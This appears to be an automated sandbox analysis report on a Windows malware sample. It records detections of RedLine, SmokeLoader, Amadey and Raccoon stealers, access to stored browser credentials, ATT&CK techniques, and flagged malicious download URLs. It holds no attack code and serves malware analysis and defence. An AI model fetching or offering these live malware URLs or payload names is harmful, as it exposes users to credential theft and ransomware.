Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\F7E3DjYJpC.exe

Code function: 0_2_00421A60 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00421A60

Source: C:\Users\user\AppData\Local\Temp\20BD.exe

Code function: 20_2_6AB94020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,

20_2_6AB94020

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 37.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000025.00000000.924712591.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.937590546.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.932395754.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.928126221.0000000000402000.00000040.00000001.sdmp, type: MEMORY

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 11.2.9A4B.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.iwbavbe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.iwbavbe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F7E3DjYJpC.exe.2d215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.20BD.exe.2fa0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.9A4B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.20BD.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.9A4B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.20BD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.F7E3DjYJpC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.F7E3DjYJpC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.iwbavbe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.iwbavbe.2bc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.F7E3DjYJpC.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.0.iwbavbe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.0.iwbavbe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.iwbavbe.2c515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.0.iwbavbe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.F7E3DjYJpC.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.F7E3DjYJpC.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.1.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.1.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.888009215.0000000002C40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.876148906.0000000004C51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.873601079.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.741479676.0000000000451000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.726672116.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.807321223.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.807649884.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.890437795.00000000047D1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.741456691.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.845161453.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY

Yara detected Amadey bot

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 27.3.5483.exe.48d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.5483.exe.48d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000003.879658236.00000000048D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5483.exe PID: 6408, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\5483.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\5483.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 37.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000025.00000000.924712591.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.937590546.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.932395754.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.928126221.0000000000402000.00000040.00000001.sdmp, type: MEMORY

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 11.2.9A4B.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.iwbavbe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.iwbavbe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F7E3DjYJpC.exe.2d215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.20BD.exe.2fa0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.9A4B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.20BD.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.9A4B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.20BD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.F7E3DjYJpC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.F7E3DjYJpC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.iwbavbe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.iwbavbe.2bc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.F7E3DjYJpC.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.0.iwbavbe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.0.iwbavbe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.iwbavbe.2c515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.0.iwbavbe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.F7E3DjYJpC.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.F7E3DjYJpC.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.1.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.1.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.888009215.0000000002C40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.876148906.0000000004C51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.873601079.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.741479676.0000000000451000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.726672116.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.807321223.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.807649884.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.890437795.00000000047D1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.741456691.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.845161453.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 27.3.5483.exe.48d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.5483.exe.48d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000003.879658236.00000000048D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5483.exe PID: 6408, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	DLL Side-Loading11	Exploitation for Privilege Escalation1	Disable or Modify Tools11	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer14	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Application Shimming1	DLL Side-Loading11	Deobfuscate/Decode Files or Information11	Input Capture1	File and Directory Discovery2	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution1	Windows Service1	Application Shimming1	Obfuscated Files or Information4	Security Account Manager	System Information Discovery15	SMB/Windows Admin Shares	Input Capture1	Automated Exfiltration	Non-Application Layer Protocol5	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter1	Registry Run Keys / Startup Folder1	Access Token Manipulation1	Software Packing23	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol26	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Service Execution2	Network Logon Script	Windows Service1	Timestomp1	LSA Secrets	Security Software Discovery331	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Process Injection912	DLL Side-Loading11	Cached Domain Credentials	Virtualization/Sandbox Evasion131	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Registry Run Keys / Startup Folder1	File Deletion1	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Masquerading11	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion131	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Access Token Manipulation1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Process Injection912	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Hidden Files and Directories1	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
F7E3DjYJpC.exe	29%	Virustotal		Browse
F7E3DjYJpC.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\31F4.exe	100%	Avira	HEUR/AGEN.1138925
C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe	100%	Avira	HEUR/AGEN.1138925
C:\Users\user\AppData\Local\Temp\9A4B.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\iwbavbe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\5483.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2CF4.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\16BC.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\39A7.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1254.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\20BD.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\69B.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\31F4.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ssbavbe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\abbavbe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\3D90.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\46D6.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\3C84.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	Metadefender		Browse
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1105.tmp	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\1105.tmp	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\20BD.exe	80%	ReversingLabs	Win32.Ransomware.StopCrypt
C:\Users\user\AppData\Local\Temp\3C84.exe	43%	ReversingLabs	ByteCode-MSIL.Trojan.Heracles
C:\Users\user\AppData\Local\Temp\3D90.exe	45%	ReversingLabs	Win32.Trojan.Raccrypt
C:\Users\user\AppData\Local\Temp\46D6.exe	57%	ReversingLabs	Win32.Trojan.Raccrypt
C:\Users\user\AppData\Local\Temp\69B.exe	39%	ReversingLabs	ByteCode-MSIL.Trojan.CrypterX
C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
26.0.31F4.exe.950000.0.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
12.0.9A4B.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.0.9A4B.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.0.iwbavbe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
24.2.46D6.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
26.0.31F4.exe.400000.5.unpack	100%	Avira	TR/AD.Amadey.ezxiu	Download File
13.2.iwbavbe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.0.iwbavbe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.0.31F4.exe.400000.9.unpack	100%	Avira	HEUR/AGEN.1143239	Download File
26.0.31F4.exe.950000.12.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
26.0.31F4.exe.950000.1.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
26.0.31F4.exe.950000.8.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
26.0.31F4.exe.950000.4.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
26.0.31F4.exe.400000.7.unpack	100%	Avira	TR/AD.Amadey.ezxiu	Download File
13.0.iwbavbe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.0.9A4B.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.9A4B.exe.2cc15a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.0.31F4.exe.400000.11.unpack	100%	Avira	HEUR/AGEN.1143239	Download File
30.0.31F4.exe.410000.1.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
26.0.31F4.exe.950000.2.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
36.0.31F4.exe.860000.2.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
13.0.iwbavbe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
20.2.20BD.exe.2fa0e50.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.9A4B.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.0.31F4.exe.860000.3.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
26.0.31F4.exe.950000.3.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
26.0.31F4.exe.950000.14.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
36.0.31F4.exe.400000.5.unpack	100%	Avira	HEUR/AGEN.1143239	Download File
4.0.F7E3DjYJpC.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
12.1.9A4B.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.0.31F4.exe.a0000.0.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
0.2.F7E3DjYJpC.exe.2d215a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
20.2.20BD.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
37.0.aspnet_regbrowsers.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1141492	Download File
4.1.F7E3DjYJpC.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.0.F7E3DjYJpC.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
37.0.aspnet_regbrowsers.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1141492	Download File
32.0.iwbavbe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
36.0.31F4.exe.400000.7.unpack	100%	Avira	HEUR/AGEN.1143239	Download File
20.1.20BD.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.0.31F4.exe.a0000.2.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
26.0.31F4.exe.400000.13.unpack	100%	Avira	TR/AD.Amadey.ezxiu	Download File
26.0.31F4.exe.400000.17.unpack	100%	Avira	TR/AD.Amadey.ezxiu	Download File
32.0.iwbavbe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
26.0.31F4.exe.950000.6.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
30.0.31F4.exe.410000.2.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
36.0.31F4.exe.860000.0.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
4.2.F7E3DjYJpC.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.0.iwbavbe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
26.0.31F4.exe.400000.15.unpack	100%	Avira	TR/AD.Amadey.ezxiu	Download File
4.0.F7E3DjYJpC.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
26.0.31F4.exe.950000.10.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
37.0.aspnet_regbrowsers.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1141492	Download File
20.3.20BD.exe.2fb0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
37.0.aspnet_regbrowsers.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1141492	Download File
32.0.iwbavbe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.2.31F4.exe.a0000.0.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
32.0.iwbavbe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
32.0.iwbavbe.400000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
36.0.31F4.exe.860000.1.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
36.0.31F4.exe.860000.12.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
36.0.31F4.exe.860000.8.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
30.0.31F4.exe.410000.0.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
36.0.31F4.exe.860000.6.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
32.0.iwbavbe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
13.0.iwbavbe.400000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
26.0.31F4.exe.400000.9.unpack	100%	Avira	TR/AD.Amadey.ezxiu	Download File
21.2.iwbavbe.2bc15a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.0.F7E3DjYJpC.exe.400000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
36.0.31F4.exe.860000.10.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
22.0.31F4.exe.a0000.3.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
26.0.31F4.exe.400000.11.unpack	100%	Avira	TR/AD.Amadey.ezxiu	Download File
13.0.iwbavbe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
32.0.iwbavbe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.iwbavbe.2c515a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
24.3.46D6.exe.2c40000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
26.0.31F4.exe.950000.16.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
22.0.31F4.exe.a0000.1.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
4.0.F7E3DjYJpC.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
37.0.aspnet_regbrowsers.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1141492	Download File
4.0.F7E3DjYJpC.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
32.1.iwbavbe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.1.iwbavbe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
24.2.46D6.exe.2c30e50.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
30.0.31F4.exe.410000.3.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
26.0.31F4.exe.950000.18.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
36.0.31F4.exe.860000.4.unpack	100%	Avira	HEUR/AGEN.1138925	Download File
4.0.F7E3DjYJpC.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://tempuri.org/DetailsDataSet1.xsd	0%	Avira URL Cloud	safe
http://sysaheu90.top/game.exe	100%	Avira URL Cloud	malware
http://www.fontbureau.comessed	0%	URL Reputation	safe
http://privacytoolzforyou-6000.top/downloads/toolspab2.exe	100%	Avira URL Cloud	malware
http://www.jiyu-kobo.co.jp/~	0%	URL Reputation	safe
http://telegalive.top/T#	100%	Avira URL Cloud	malware
http://www.jiyu-kobo.co.jp/9	0%	URL Reputation	safe
http://www.fontbureau.comtue	0%	Avira URL Cloud	safe
http://www.fontbureau.comB.TTF	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp//	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/8?QRs	0%	Avira URL Cloud	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://toptelete.top/agrybirdsgamerept	100%	Avira URL Cloud	malware
http://www.sakkal.com	0%	URL Reputation	safe
http://hajezey1.top/	100%	Avira URL Cloud	malware
https://api.ip.sb/ip	0%	URL Reputation	safe
http://www.fontbureau.comF	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/T	0%	URL Reputation	safe
http://91.219.236.97/	0%	Avira URL Cloud	safe
http://nusurtal4f.net/	0%	Avira URL Cloud	safe
http://znpst.top/dl/buildz.exe	100%	Avira URL Cloud	malware
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/B	0%	URL Reputation	safe
http://www.fontbureau.comd	0%	URL Reputation	safe
http://www.fontbureau.comC.TTF	0%	Avira URL Cloud	safe
http://91.219.236.97//l/f/ip0YyXwB3dP17SpzPFlO/7c7502fb88fbef5f30b90af154a6ea21b780c146	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.comFq	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn-:	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cnx)T	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cno.n)N	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.fontbureau.como	0%	URL Reputation	safe
